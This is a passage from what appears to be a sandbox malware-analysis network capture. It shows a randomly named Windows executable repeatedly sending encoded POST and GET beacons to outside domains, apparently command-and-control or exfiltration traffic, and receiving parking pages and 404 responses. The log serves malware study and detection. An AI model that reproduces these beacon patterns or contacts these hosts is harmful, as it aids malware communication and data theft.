                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:17:54.566566944 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTI0ZWJmZjgtNjQ5OC00Yjc5LTg3ZjktYzhiZTY0MmJmZWQzIiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.549756199.59.243.226803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:56.643054008 CEST814OUTPOST /k4dg/ HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.mommysdaycare.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.mommysdaycare.net/k4dg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 71 78 51 6c 45 2b 6c 6f 2f 6b 54 6f 66 4e 38 41 74 49 45 62 6c 6b 4d 7a 61 35 77 62 7a 36 67 42 34 4a 4b 6f 35 35 73 50 5a 38 6c 32 35 39 42 39 65 51 34 48 35 78 47 33 34 4d 74 4a 71 5a 4e 36 47 4b 4f 6b 6b 75 64 6d 50 76 33 39 79 30 6d 4a 72 4a 52 47 39 36 79 33 73 71 69 4b 39 6e 31 31 42 76 6f 56 31 6b 46 38 32 6d 77 45 4e 78 56 78 48 75 39 61 53 2f 5a 5a 61 53 5a 45 50 35 51 4a 61 36 7a 46 69 53 58 76 65 44 43 7a 39 56 31 6c 66 5a 64 44 6d 69 44 41 30 47 52 54 41 59 48 4f 68 68 70 79 47 6a 59 48 55 45 32 6f 2b 4e 44 39 65 51 4a 42 46 78 4d 69 49 72 77 58 68 62 56 69 55 59 77 4f 34 4d 2b 43 55 30 57 35 4b 57 57 7a 6c 2f 30 34 61 6d 47 49 2f 5a 59 53
                                              Data Ascii: 4dV43tA=qxQlE+lo/kTofN8AtIEblkMza5wbz6gB4JKo55sPZ8l259B9eQ4H5xG34MtJqZN6GKOkkudmPv39y0mJrJRG96y3sqiK9n11BvoV1kF82mwENxVxHu9aS/ZZaSZEP5QJa6zFiSXveDCz9V1lfZdDmiDA0GRTAYHOhhpyGjYHUE2o+ND9eQJBFxMiIrwXhbViUYwO4M+CU0W5KWWzl/04amGI/ZYS
                                              Jul 1, 2024 16:17:57.103627920 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:17:56 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1134
                                              x-request-id: 0879428c-e794-40fa-8381-9635b759e46c
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==
                                              set-cookie: parking_session=0879428c-e794-40fa-8381-9635b759e46c; expires=Mon, 01 Jul 2024 14:32:57 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 53 36 48 78 31 51 67 39 78 78 35 6b 6d 45 55 61 59 48 77 51 66 65 79 76 44 4c 48 66 71 6b 43 6d 42 4e 7a 32 2f 76 78 48 45 34 4e 50 47 53 32 76 63 46 55 70 53 69 42 48 52 41 48 46 67 46 77 48 7a 62 57 74 4f 62 6f 39 33 5a 6a 70 6e 37 65 5a 58 41 6b 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:17:57.103652954 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDg3OTQyOGMtZTc5NC00MGZhLTgzODEtOTYzNWI3NTllNDZjIiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.549757199.59.243.226803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:59.170070887 CEST1831OUTPOST /k4dg/ HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.mommysdaycare.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.mommysdaycare.net/k4dg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 71 78 51 6c 45 2b 6c 6f 2f 6b 54 6f 66 4e 38 41 74 49 45 62 6c 6b 4d 7a 61 35 77 62 7a 36 67 42 34 4a 4b 6f 35 35 73 50 5a 38 74 32 35 4f 4a 39 66 78 34 48 34 78 47 33 35 4d 74 45 71 5a 4d 34 47 4b 48 6a 6b 75 51 64 50 73 50 39 77 57 75 4a 38 71 4a 47 75 61 79 33 6c 4b 69 48 67 33 30 76 42 73 41 4a 31 6e 39 38 32 6d 77 45 4e 79 64 78 46 39 6c 61 56 50 5a 61 5a 53 5a 59 46 5a 51 74 61 36 72 56 69 53 44 46 66 33 32 7a 39 31 6c 6c 4d 62 46 44 37 53 44 47 34 6d 52 4c 41 59 61 65 68 68 31 41 47 6a 63 68 55 43 47 6f 36 72 75 2b 46 52 52 73 65 6e 55 68 46 5a 30 4a 77 75 5a 43 5a 5a 6b 6e 39 2b 57 6a 56 45 58 52 64 52 65 54 6e 4e 78 45 4f 52 53 6b 75 4a 6b 64 5a 36 38 6d 74 34 45 5a 45 74 77 39 69 67 79 65 4e 66 46 42 35 30 43 52 57 45 36 50 2f 4b 79 57 41 7a 64 31 61 6a 76 54 63 6e 75 4e 36 66 4d 32 4d 72 59 43 68 6a 59 49 6d 4c 6c 41 77 2f 55 66 79 73 49 59 59 4b 6d 70 6d 79 37 66 6f 4a 33 4d 51 4c 62 46 36 68 55 2f 4d 54 2f 4f 57 6c 45 2b 71 39 56 50 4d 43 65 43 57 53 49 76 32 34 [TRUNCATED]
                                              Data Ascii: 4dV43tA=qxQlE+lo/kTofN8AtIEblkMza5wbz6gB4JKo55sPZ8t25OJ9fx4H4xG35MtEqZM4GKHjkuQdPsP9wWuJ8qJGuay3lKiHg30vBsAJ1n982mwENydxF9laVPZaZSZYFZQta6rViSDFf32z91llMbFD7SDG4mRLAYaehh1AGjchUCGo6ru+FRRsenUhFZ0JwuZCZZkn9+WjVEXRdReTnNxEORSkuJkdZ68mt4EZEtw9igyeNfFB50CRWE6P/KyWAzd1ajvTcnuN6fM2MrYChjYImLlAw/UfysIYYKmpmy7foJ3MQLbF6hU/MT/OWlE+q9VPMCeCWSIv2465jYsPOvgrr6TQV6r33O4W65Zjv/jBELjkqxhSHqwYuo9TZHDXz4xs8U3TAt5UFIeZ4+8aih489rJVB6Ky0PETH2wlEVvlChqKetolRIVKKpabTgY5v5+0if4SwTLJlzJR8FrOZqVeIsLKIZjo2o/E9r+IHS+VF5gkd9pl+5g8UOXT3FYEpT+YxPB3wxCnCcSS7UY9R6FkkKiSJWwK63gP1lylywH+CUhroW4doRiS90tgczMYagJXzzLMgHlCMnCJMa91c4DEI2pSVkht4oX/HrTKXstmkhW44EsdeeNt3Fdx0JPAc03vRrm5Gi4Wg0qFWH6+KEBv/RlqfBk4xsFKToOMaX47Q9o+nha/b8I/7LZOVhYY1Yx4popCnIqyc/bxGVdf3PzXDmh+HZ6jY5fHBQAremOnchv3QFvBRWdnCJ55gzxreH6h5UFGdTGjcjw2PoPkZkRmP3cLSgYr0uAW2gd6KojLh+FGZ39Y1QZuNKWm+Lbsa+e38HhpzXkZpOsLRZmN3iXzMpT7yPDjcrkUk77VUwNJKPZuriDZe1ottSZFJ2PqttPTvOZy+x1icfnX4HGoTtYrraL+JprNW8gx64+UcMt2asmIQ/zWQl5bjvYyYbSV7zpbPHhIENz2tAJKiyhXy3+habxFxAhu+/bWpDupCiR66uEV [TRUNCATED]
                                              Jul 1, 2024 16:17:59.644108057 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:17:59 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1134
                                              x-request-id: d3832461-c60f-41d9-970a-bf206e4c9534
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==
                                              set-cookie: parking_session=d3832461-c60f-41d9-970a-bf206e4c9534; expires=Mon, 01 Jul 2024 14:32:59 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 53 36 48 78 31 51 67 39 78 78 35 6b 6d 45 55 61 59 48 77 51 66 65 79 76 44 4c 48 66 71 6b 43 6d 42 4e 7a 32 2f 76 78 48 45 34 4e 50 47 53 32 76 63 46 55 70 53 69 42 48 52 41 48 46 67 46 77 48 7a 62 57 74 4f 62 6f 39 33 5a 6a 70 6e 37 65 5a 58 41 6b 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:17:59.644196987 CEST587INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDM4MzI0NjEtYzYwZi00MWQ5LTk3MGEtYmYyMDZlNGM5NTM0IiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.549758199.59.243.226803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:01.702274084 CEST532OUTGET /k4dg/?4dV43tA=nz4FHKR3kHD8T7sos5tKkVQRfY182oQFmZOBlJ8PbPlp6eprRQ8g6Bnz+oNd18dyAKSZqsJ9UtPL5lP5nYFy9dCb86j6n0RTbdEdkH9XwmQfMRZVI+dcEtE4XSVBGLRbLA==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:02.193284035 CEST1236INHTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:18:01 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1518
                                              x-request-id: 6973e5e4-a21a-4873-91da-5ae22c10d7ed
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ESgTqOqO7qsVfXIKGo4mnKaXjLOKA9byi0726FEznFAU/jC+Ekk2Ywy03VeqehfiT6lvaOtHdNAVpWUx9cexhw==
                                              set-cookie: parking_session=6973e5e4-a21a-4873-91da-5ae22c10d7ed; expires=Mon, 01 Jul 2024 14:33:02 GMT; path=/
                                              connection: close
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 45 53 67 54 71 4f 71 4f 37 71 73 56 66 58 49 4b 47 6f 34 6d 6e 4b 61 58 6a 4c 4f 4b 41 39 62 79 69 30 37 32 36 46 45 7a 6e 46 41 55 2f 6a 43 2b 45 6b 6b 32 59 77 79 30 33 56 65 71 65 68 66 69 54 36 6c 76 61 4f 74 48 64 4e 41 56 70 57 55 78 39 63 65 78 68 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ESgTqOqO7qsVfXIKGo4mnKaXjLOKA9byi0726FEznFAU/jC+Ekk2Ywy03VeqehfiT6lvaOtHdNAVpWUx9cexhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:18:02.193368912 CEST971INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjk3M2U1ZTQtYTIxYS00ODczLTkxZGEtNWFlMjJjMTBkN2VkIiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.54975945.207.12.95803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:07.346514940 CEST770OUTPOST /dy54/ HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.203av.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.203av.com/dy54/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 71 54 48 68 4d 6e 48 53 74 31 46 6b 37 6e 33 58 69 69 77 36 44 75 6e 53 47 76 68 70 31 49 69 6c 64 48 6a 4a 63 33 73 45 41 71 77 68 68 4c 76 76 4f 4a 42 33 41 53 62 53 61 57 51 37 52 34 35 79 47 59 6e 72 57 6c 35 53 79 4b 2b 6b 73 72 50 42 51 48 74 4e 74 46 4f 47 55 70 4b 76 30 78 30 75 73 76 46 41 2f 71 41 7a 58 76 68 74 2f 48 49 4e 66 77 4f 69 6e 30 72 42 38 37 64 6c 39 74 4d 33 38 4e 66 5a 52 78 6d 32 57 4d 2b 43 42 4a 74 4a 52 76 73 68 44 4f 6e 48 68 71 2b 37 4a 6a 63 32 74 54 55 57 42 65 57 67 30 32 56 54 78 59 65 41 67 4f 33 39 33 43 58 77 4a 39 54 55 4f 61 77 70 75 77 42 72 52 68 77 3d
                                              Data Ascii: 4dV43tA=qTHhMnHSt1Fk7n3Xiiw6DunSGvhp1IildHjJc3sEAqwhhLvvOJB3ASbSaWQ7R45yGYnrWl5SyK+ksrPBQHtNtFOGUpKv0x0usvFA/qAzXvht/HINfwOin0rB87dl9tM38NfZRxm2WM+CBJtJRvshDOnHhq+7Jjc2tTUWBeWg02VTxYeAgO393CXwJ9TUOawpuwBrRhw=
                                              Jul 1, 2024 16:18:08.266159058 CEST492INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:07 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.54976045.207.12.95803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:18:09.886069059 CEST790OUTPOST /dy54/ HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.203av.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.203av.com/dy54/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 71 54 48 68 4d 6e 48 53 74 31 46 6b 70 30 76 58 6b 42 49 36 46 4f 6e 56 4a 50 68 70 73 59 6a 73 64 48 76 4a 63 31 41 71 42 59 6b 68 68 76 6a 76 50 49 42 33 44 53 62 53 43 6d 51 2b 4d 6f 35 70 47 66 76 4a 57 6b 46 53 79 4b 36 6b 73 75 6a 42 51 30 46 4d 2f 6c 4f 45 4e 35 4b 74 77 78 30 75 73 76 46 41 2f 71 38 56 58 76 35 74 2f 32 59 4e 51 78 4f 74 6d 30 72 43 31 62 64 6c 76 64 4d 7a 38 4e 66 72 52 31 47 4d 57 4b 36 43 42 49 64 4a 52 37 34 2b 55 65 6e 42 76 4b 2f 2b 59 43 68 6d 7a 43 59 58 4d 64 79 6f 33 6b 52 6c 39 4f 7a 71 36 73 2f 56 6b 69 37 49 5a 75 62 6a 66 71 52 41 30 54 52 62 50 32 6b 52 39 68 46 6b 56 63 32 68 65 53 73 68 6f 4b 45 49 74 78 33 41
                                              Data Ascii: 4dV43tA=qTHhMnHSt1Fkp0vXkBI6FOnVJPhpsYjsdHvJc1AqBYkhhvjvPIB3DSbSCmQ+Mo5pGfvJWkFSyK6ksujBQ0FM/lOEN5Ktwx0usvFA/q8VXv5t/2YNQxOtm0rC1bdlvdMz8NfrR1GMWK6CBIdJR74+UenBvK/+YChmzCYXMdyo3kRl9Ozq6s/Vki7IZubjfqRA0TRbP2kR9hFkVc2heSshoKEItx3A
                                              Jul 1, 2024 16:18:10.806495905 CEST492INHTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:10 GMT
                                              Connection: close
                                              Content-Length: 315
